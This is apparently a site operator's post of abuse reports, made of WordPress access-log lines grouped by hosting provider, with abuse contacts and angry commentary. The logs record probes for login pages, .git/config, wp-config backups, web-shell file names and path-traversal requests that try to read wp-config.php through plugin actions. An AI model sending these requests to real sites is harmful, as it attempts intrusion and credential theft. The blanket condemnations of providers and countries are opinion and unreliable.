212.116.231.23 website*x.com – – [20/Jul/2025:03:58:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS29182 – JSC IOT – VERY UNWANTED! – COMPLETE BLOCKED – ALSO RUSSIA IS VERY UNWANTED AND COMPLETE BLOCKED!!!
abuse@aoiot.ru
91.228.225.143 website*x.com – – [20/Jul/2025:06:38:13 +0200] „GET /wp-content/plugins/customer-reviews-woocommerce/js/form.js HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

–

MAIL NR. 15 TODAY!
abuse@ionos.com,abuse@cheapy.host,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
4 PROVIDER
AS8560 – IONOS SE – IONOS AGAIN AND AGAIN! – VERY UNSECURE NETWORKS!
abuse@ionos.com
109.228.53.70 website*x.com – – [19/Jul/2025:13:51:16 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
109.228.53.70 website*x.com – – [19/Jul/2025:13:51:16 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
109.228.53.70 website*x.com – – [19/Jul/2025:13:51:16 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0“
+
109.228.53.70 website*x.com – – [20/Jul/2025:10:34:49 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
109.228.53.70 website*x.com – – [20/Jul/2025:10:34:49 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
AS401120 – cheapy.host LLC – DAILY THE SAME HACKING-ATTEMPTS! – NO ANSWER… NOTHING – HE DOES NOTHING ABOUT ABUSE-MAILS FROM US!!!
abuse@cheapy.host
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:27 +0200] „GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:37 +0200] „GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:37 +0200] „GET /wp-config.php.orig HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:37 +0200] „GET /wp-config.backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:37 +0200] „GET /wp-admin/admin-ajax.php?action=ai1wm_export HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:47 +0200] „GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:57 +0200] „GET /wp-config.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:58 +0200] „GET /wp-config.php.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:36:58 +0200] „GET /wp-config.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:37:08 +0200] „GET /wp-config.php.old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:37:08 +0200] „GET /wp-config.php.save HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:37:08 +0200] „GET /wp-config.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
196.251.85.8 website*x.com – – [20/Jul/2025:02:37:08 +0200] „GET /wp-config.old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS51167 – Contabo GmbH – CONTABO AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@contabo.de
167.86.74.247 website*x.com – – [20/Jul/2025:07:12:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [20/Jul/2025:07:12:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [20/Jul/2025:07:12:46 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“

–

MAIL NR. 16 TODAY!
abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@fasthosts.co.uk,abuse@all-inkl.com
AS16276 – OVH SAS – OVH AGAIN AND AGAIN! OVH IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net
51.89.3.212 www.website*x.de – – [19/Jul/2025:11:08:41 +0200] „GET /blog-verify HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.89.3.212 www.website*x.de – – [19/Jul/2025:11:08:41 +0200] „GET /images/images/cache.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
AS34788 – Neue Medien Muennich GmbH
abuse@all-inkl.com
85.13.163.146 www.website*x.de – – [20/Jul/2025:05:25:38 +0200] „GET /wp-login.php HTTP/1.0“ 302 – „“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0“
AS16276 – OVH SAS – NEXT ONE OVH! – AGAIN AND AGAIN! OVH IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net,abuse@fasthosts.co.uk
51.89.3.212 www.website*x.de – – [20/Jul/2025:09:27:21 +0200] „GET /about.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.89.3.212 www.website*x.de – – [20/Jul/2025:09:27:21 +0200] „GET /admin.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

–

MAIL NR. 17 TODAY!
abuse@snthostings.com,abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com,ripe@bkm.uz,abuse@aoiot.ru,abuse.irt@ptcl.net,csirt@ptcl.net
4 PROVIDER
AS140947 – SnTHostings – THIS PROVIDER IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@snthostings.com
103.153.183.1 website*x.de – – [19/Jul/2025:04:23:09 +0200] „GET /wp-content/themes/travelscape/json.php HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
103.153.183.1 website*x.de – – [19/Jul/2025:04:23:11 +0200] „GET /wp-content/themes/aahana/json.php HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
103.153.183.1 website*x.de – – [19/Jul/2025:04:23:12 +0200] „GET /wp-content/themes/travel/issue.php HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
103.153.183.1 website*x.de – – [19/Jul/2025:04:23:14 +0200] „GET /about.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
AS8075 – Microsoft Corporation – MICROSOFT ALSO AGAIN AND AGAIN! VERY UNSECURE!!! YOU ONLINE-FORM IS A NOGO!!!
abuse@microsoft.com
172.207.130.126 website*x.de – – [19/Jul/2025:11:26:47 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“
AS8193 – „Uzbektelekom“ Joint Stock Company – VERY IGNORANT PROVIDER! NO ANSWER… NOTHING! – IS COMLETE UNWANTED AND COMPLETE BLOCKED!
ALSO RUSSIA IST COMPLETE UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ripe@bkm.uz,abuse@aoiot.ru
84.54.71.39 website*x.de – – [20/Jul/2025:08:16:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS17557 – Pakistan Telecommunication Company Limited – IS ALSO NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.irt@ptcl.net,csirt@ptcl.net
119.152.4.210 website*x.de – – [20/Jul/2025:08:16:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/76.0.0.0 Safari/537.36“

–

MAIL NR. 18 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,abuse@cloudflare.com,abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com
AS396982 – Google LLC – WE HAS SEND THIS AGAIN AND AGAIN!!! – VERY UNSECURE NETWORKS!!!
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:56 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:56 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:57 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.168.103.200 website*x.com – – [21/Jul/2025:01:35:58 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
AS13335 – Cloudflare, Inc.
abuse@cloudflare.com
2a09:bac5:50c8:432::6b:6a website*x.com – – [21/Jul/2025:03:42:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS8075 – Microsoft Corporation – MICROSOFT ALSO AGAIN AND AGAIN! VERY UNSECURE!!!
abuse@microsoft.com
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:01 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:02 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:02 +0200] „GET /classwithtostring.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:03 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:03 +0200] „GET /link.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:03 +0200] „GET /wp-fmfile.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:03 +0200] „GET /wi.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:03 +0200] „GET /function.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:03 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /wp-includes/about.php HTTP/1.0“ 403 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /.well-known/classwithtostring.php HTTP/1.0“ 403 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /admin/controller/extension/extension/ultra.php HTTP/1.0“ 403 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /403.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /13.php HTTP/1.0“ 302 – „-“ „-“
52.164.221.236 website*x.com – – [21/Jul/2025:03:57:04 +0200] „GET /wp-content.php.php HTTP/1.0“ 302 – „-“ „-“
… and so on… VERY UNSECURE!!!

–

MAIL NR. 19 TODAY!
abuse@as210558.net,abuse@nothingtohide.nl
2 PROVIDERS
AS23470 – ReliableSite.Net LLC – VERY IGNORANT PROVIDER! – NO ANSWER ABOUT MAILS… NOTHING!!! COMPLETE BLOCKED!
abuse@as210558.net
45.88.186.92 www.website*x.com – – [21/Jul/2025:04:52:39 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://website*x.com/.git/config“ „Go-http-client/1.1“
AS1101 – IP-EEND BV – TOR-EXIT S H I T IS VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nothingtohide.nl
192.42.116.215 www.website*x.com – – [21/Jul/2025:04:52:40 +0200] „GET /.git/config HTTP/1.0“ 403 – „http://website*x.com/.git/config“ „Go-http-client/1.1“
+
192.42.116.196 www.website*x.com – – [21/Jul/2025:04:52:47 +0200] „GET /.DS_Store HTTP/1.0“ 403 – „https://website*x.com/.DS_Store“ „Go-http-client/1.1“
AS210558 – 1337 Services GmbH – TOR-EXIT S H I T IS VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@as210558.net
124.198.132.52 www.website*x.com – – [21/Jul/2025:04:52:42 +0200] „GET /.DS_Store HTTP/1.0“ 403 – „https://website*x.com/.DS_Store“ „Go-http-client/1.1“

–

MAIL NR. 20 TODAY!
bucklog@proton.me,abuse@ntup.net,abuse@virtualine.org
AS211590 – Bucklog SARL – VERY IGNORANT AND UNSECURE PROVIDER – DAILY THE SAME HACKING-ATTEMPTS! – NO ANSWER… NOTHING – HE DOES NOTHING ABOUT ABUSE-MAILS FROM US!!!
bucklog@proton.me
185.177.72.38 website*x.com – – [21/Jul/2025:02:51:40 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 5.1.1; Coolpad 3622A Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36“
AS48693 – Rices Privately owned enterprise – VERY IGNORANT! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ntup.net
194.145.227.125 website*x.com – – [21/Jul/2025:03:16:52 +0200] „GET /joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“
AS214940 – KPROHOST LLC – VERY IGNORANT AND UNSECURE PROVIDER – DAILY THE SAME HACKING-ATTEMPTS! – NO ANSWER… NOTHING – HE DOES NOTHING ABOUT ABUSE-MAILS FROM US!!!
abuse@virtualine.org
198.55.98.182 website*x.com – – [21/Jul/2025:07:27:57 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344“

–

MAIL NR. 21 TODAY!
info@smartlink-isp.com,admin@frantech.ca,fdias@frantech.ca,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
AS210413 – Smart Link Company for Internet Service, special company and limited – IRAQ IS COMPETE BLOCKED – TO IGNORANT, NO ANSWER!
info@smartlink-isp.com
45.157.54.21 website*x.com – – [21/Jul/2025:06:35:00 +0200] „GET /files.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
AS53667 – FranTech Solutions – NEXT ONE!!! STOP THIS NOW! – ANSWER ABOUT OUR ABUSE-MAILS!
admin@frantech.ca,fdias@frantech.ca
209.141.47.37 website*x.com – – [21/Jul/2025:07:40:23 +0200] „POST /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
209.141.47.37 website*x.com – – [21/Jul/2025:07:40:30 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“
AS16276 – OVH SAS – OVH ALSO AGAIN AND AGAIN EVERY DAY!!!
abuse@ovh.net
145.239.10.137 website*x.com – – [21/Jul/2025:09:08:11 +0200] „GET /static2.php HTTP/1.0“ 302 20 „http://website*x.com/static2.php“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1“

–

MAIL NR. 22 TODAY!
abuse@ntup.net,qcloud_net_duty@tencent.com,abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com
AS48693 – Rices Privately owned enterprise – VERY IGNORANT! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ntup.net
194.145.227.125 website*x.com – – [21/Jul/2025:02:28:08 +0200] „GET /joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“
AS132203 – Tencent Building, Kejizhongyi Avenue – DAILY REFERRER-SPAM – VERY IGNORANT! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com
43.130.102.223 www.website*x.com – – [21/Jul/2025:02:37:47 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“
AS8075 – Microsoft Corporation – MICROSOFT ALSO AGAIN AND AGAIN! VERY UNSECURE!!!
abuse@microsoft.com
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:21 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:21 +0200] „GET /wp-includes/Text/network.php HTTP/1.0“ 403 – „-“ „-“
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:21 +0200] „GET /wp-content/upgrade-temp-backup/wp-login.php HTTP/1.0“ 403 – „-“ „-“
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:22 +0200] „GET /js/fm.php HTTP/1.0“ 403 – „-“ „-“
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:22 +0200] „GET /wp-content/themes/astra/inc/ki1k.php HTTP/1.0“ 403 – „-“ „-“
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:22 +0200] „GET /WordPress/wp-admin/includes/zmFM.php HTTP/1.0“ 403 – „-“ „-“
68.218.88.48 website*x.com – – [21/Jul/2025:04:04:22 +0200] „GET /default.php HTTP/1.0“ 302 – „-“ „-“
+ DAILY REFERRER-SPAM TO THIS DUBIOUS WEBSITE AND MICROSOFT DOES NOTHING ABOUT THIS!!!
20.193.136.32 website*x.com – – [21/Jul/2025:04:28:55 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

–

MAIL NR. 23 TODAY!
abuse@m247.ro,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
AS9009 – M247 Europe SRL
abuse@m247.ro
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:12 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:12 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:12 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:13 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:14 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:14 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:15 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:15 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:16 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:16 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:17 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
130.195.241.7 website*x.com – – [21/Jul/2025:02:06:18 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
